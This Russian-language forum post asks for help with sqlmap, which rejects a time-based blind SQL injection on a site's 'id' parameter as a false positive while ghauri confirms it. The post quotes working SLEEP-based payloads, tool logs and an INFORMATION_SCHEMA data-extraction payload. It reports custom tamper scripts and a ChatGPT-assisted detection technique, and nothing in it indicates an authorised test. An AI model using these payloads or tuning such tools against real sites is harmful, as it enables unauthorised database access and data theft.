Приветствую ребят, имеется такая проблема что sqlmap дает false positive хотя там уязвимость есть, что доказывает ghauri
Основной запрос что работает:
Из за этого запроса дает false positive:
В ghauri все прекрасно проверяет:
Пример как ghauri выдает данные:
Пытался обойти с помощью многих тамперов в том числе самописные, пытался написать новую технику чека в time_blind.xml с помощью чатагпт но все бесполезно, кто сталкивался с такой проблемой, подскажите советом, буду благодарен
Основной запрос что работает:
[PAYLOAD] 32 AND (SELECT 4395 FROM (SELECT(SLEEP(5)))LCFs)Из за этого запроса дает false positive:
[23:11:00] [INFO] checking if the injection point on GET parameter 'id' is a false positive[23:11:00] [PAYLOAD] [B]32 AND (SELECT 2400 FROM (SELECT(SLEEP(5-(IF(33=33,0,5)))))qyzE)[/B][23:11:00] [WARNING] false positive or unexploitable injection point detectedВ ghauri все прекрасно проверяет:
[23:21:02] [DEBUG] sleep time: 5, response time: 5.246932029724121[23:21:02] [DEBUG] Test: (SELECT(0)FROM(SELECT(SLEEP(5)))a), Response Time 5.246932029724121GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]Пример как ghauri выдает данные:
(SELECT(0)FROM(SELECT(IF(LENGTH(LENGTH((SELECT COUNT(*)FROM(INFORMATION_SCHEMA.SCHEMATA))))=1,SLEEP(3),0)))a)Пытался обойти с помощью многих тамперов в том числе самописные, пытался написать новую технику чека в time_blind.xml с помощью чатагпт но все бесполезно, кто сталкивался с такой проблемой, подскажите советом, буду благодарен
